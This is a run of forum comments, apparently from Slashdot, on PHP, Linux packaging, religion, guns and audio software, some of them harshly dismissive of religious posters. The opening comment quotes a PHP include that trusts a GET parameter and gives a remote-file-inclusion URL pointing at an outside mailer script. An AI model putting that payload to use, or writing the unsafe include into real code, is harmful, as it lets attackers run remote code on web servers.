    What is so difficult with:

    require("header.php");
    print 'top of page';
    require($_GET['page'].'.html');
    print 'bottom of page'; ... where the content is changed with a GET variable, i.e. mylayout.php?page=mycontent
    (using print rather than escaping to html due to slashdot restrictions) weeee what an invitation for spammers.
    i almost always try to remotely include google.com when i see crap like this and in 90% of all cases it works.

    mylayout.php?page=http://url.to.some.mailer/script.php?

    happy spamming.
    and no, most hosters are not using php6 or have remote includes disabled.

    so you add or remove / trun it on or off at any time with out havening to reinstall widnows server.


    Err, on a server, why would you want to? (okay, so I'm one of those freaks who insist on running his servers at runlevel 3, but still... serious non-trolling question here: why?)

    If I choose not to display /any/ images, am I "stealing" from all the sites with banner ads? Advertising-supported sites are paid for by advertisers, who understand that they're not going to get everyone. You're not taking something that the site host is selling, unless you're an advertiser and you're inserting your own ads into his pages without paying. Then you'd be stealing. allow me to rephrase that:

    music-industry-supported musicians are paid for by the music-industry, who understand that they're not going to get everyone. You're not taking something that the musician is selling, unless you're a musician and you're inserting your own audio files into his pages without paying. Then you'd be stealing.

    Your religion sucks too (assuming you are a Christian). Living under Islamic law is not so different from living under Christian law except there is no "christian law" since western civilizations realized that religion has no place in law enforcement. you might wanna think about that.

    with malware because Linux is a hostile environment.

    Unix systems can be infected, like the original Arpanet worm that Robert Morris Jr. was accused of writing that infected Sendmail Unix servers.

    I had run a Linux server in the past for my web server and I noticed things like that which forced me to reformat the system because Linux was acting funny with directory names and log files kept being deleted for no reason, to hide the malware infections and/or hacking attempts. sorry but this really doesn't sound like you knew what you were doing.

    It's important to recognize that you can't possibly measure which OS has the fewest flaws absolutely. You can only measure which OS has the fewest flaws reported (or discovered). Since the number of flaws reported is proportional to the number of people using the OS, and no one is using Linux, it's natural that it'd have the fewest reported flaws. :)
    see how stupid that sounds put in a different context? I hate MS as much as anyone here but there enough spin on this to make you vomit. by your logic, linux should have had far far fewer vulnerabilities relative to vista because it's on about 1/20th as many systems... period. you do know that there are computers that are not desktop computers in the world. do you?

    of course not all education will be this bad but this surely makes the question arise if this is intentional to keep people uneducated.

    Also you can easily write command line apps in java, so i don't know why they blamed gui dependancy on java. i agree. i have been programming in java for the last 6 years in my company and have so far not written any gui code. i like java as a server-side language.
    to TFA; i think it's quite easy to blame the mass of bad programmers on a language but the more correct approach would be to look at companies' policies on employment and companies like microsoft (not only, no bashing intended) who keep telling the world that computers are easy to use.

    For a site without those advantages, say one just starting out, people costing bandwidth without contributing ad hits might make the difference between being in the black and being in the red. just leave out the adbanners to save bandwidth :D

    Yup, if one of those professors or even another student had been carrying a gun the massacre could have been stopped much earlier. People think the police are there to protect you but that is not the case. The police are there to clean up and figure out what happened after a crime takes place. There is no way they can protect all citizens, even in the police state that we're moving toward. Your safety is your responsibility. lol what a hilarious posting. that must be why america is the safest country on earth where noone ever shoots anyone.
    MORE GUNS FOR MORE PEACE! now _that_ makes sense.
    i don't really believe the numbers mentioned in 'bowling for columbine' but i am quite sure that the US have the most gun-related killings on this planet.

    So getting back to your question about infallibility. Relative to us, God is effectively infinitely perfect, just as relative to us, the universe is effectively infinitely big. While the universe isn't actually infinitely big, it's unknowable with our puny brains if God is actually infinitely perfect.

    But if he is, I'd reason that the reason we aren't perfect is a mercy. Let's face it. Perfection is *boring*. well that is a different subject. all i am saying is that the creation theory has so many flaws and can so easily be torn apart just by a little reasoning and logic that i cannot accept to see it on the same level as a *real* scientific theory such as darwin's theory of evolution.

    i have nothing against religious people...i don't understand them but i accept that they believe things that seem idiotic to me. but having creationism try to compete with science is just ridiculous.

    The God of the old testament is "evil God", the God that Jesus spoke of in the New testament is the good God. another contradiction of a perfect god. if god was perfect, why did he have to change? :D

    seriously, the more i think about it the more ridiculous all this gets for me. i wonder how people can actually believe all this.

    I.e., if I have a free will, and I choose to rape a woman...Exactly how does my free will lessen my responsibility? it doesn't. but a perfect individual would never make a wrong decision. (meaning a decision that would enrage their creator)

    If God made us unable to disobey him then we would simply be automatons, no different then the many mindless forces and systems in the universe. God gave us free will which is part of the "in his image" deal. the same ridiculous argument again. i have heard that a million times. if he gave us a free will he cannot punish us for our decisions. (= kick us out of paradise). do you religious guys actually ever think something through? the fact that in the bible god punishes mankind which is assumed to be perfect directly contradicts that god is infallible.

    Read the bible before trying to dispute it, you might learn something. You don't even have to read far to see that God created man in His image (i.e. perfect). Their disobedience caused their fall which brought on death and corruption. if humans had been perfect they wouldn't have disobeyed in the first place.
    -> god is not perfect.
    discussing with christians is just too easy. anybody with half a brain should see that statements like that can't even withstand a simple logical test.

    If there are dependent packages for a particular software, the package manager doesn't download those automatically. The names are cryptic sometimes and for the average user to know what GDK to download to get Firefox to work, is more trouble than it's worth. in which century did you last use a package manager? :D of course deps are downloaded automatically. you need to know NOTHING about package dependencies.

    Dependencies aren't bundled into any package manager. uhm...yes they are? that is the whole point of having one?

    And if you download a program off of the web (say Firefox, because that's how you do it in Windows), then there's no way to install it with any amount of ease. that's why you use a package manager. start adept, select firefox, click install -> done
    seriously, what you replied is wrong. you should have a look into some current distro.

    At this point you've already lost the 'average' user. On a desktop OS, you shouldn't HAVE to drop to the terminal for ANYTHING. Click and Run technology is going to be one of the biggest things to hit Linux, IF it's widely adopted. I understand that the ability is great to have all packages listed in a Yum repository or using apt-get, or whatever, but frankly... there's no simple way to download say, Firefox and install it off of the web. Trying to explain to a user how to uninstall the old version first, then making sure the main icon points to the NEW installation and not the old one is quite a task. i'm not quite sure what you are talking about o.O using synaptic or adept you don't have to do any of these things you describe. what you wrote sounds like the way to go on windows due to the lack of a package manager.

    Musicians should not rely on Pro Tools. That's all. sorry but as a linux developer and audio engineer, who has worked in the business for quite some time i just have to say pro tools + plugins (waves, rcl etc) is just so much better than anything that exists for linux. there are universes between pro tools (especially with hardware + automation) and almost any other audio software i ever tried. i really love linux but if i want to work fast, productive an in top quality on audio i will by any means choose a mac + pro tools.
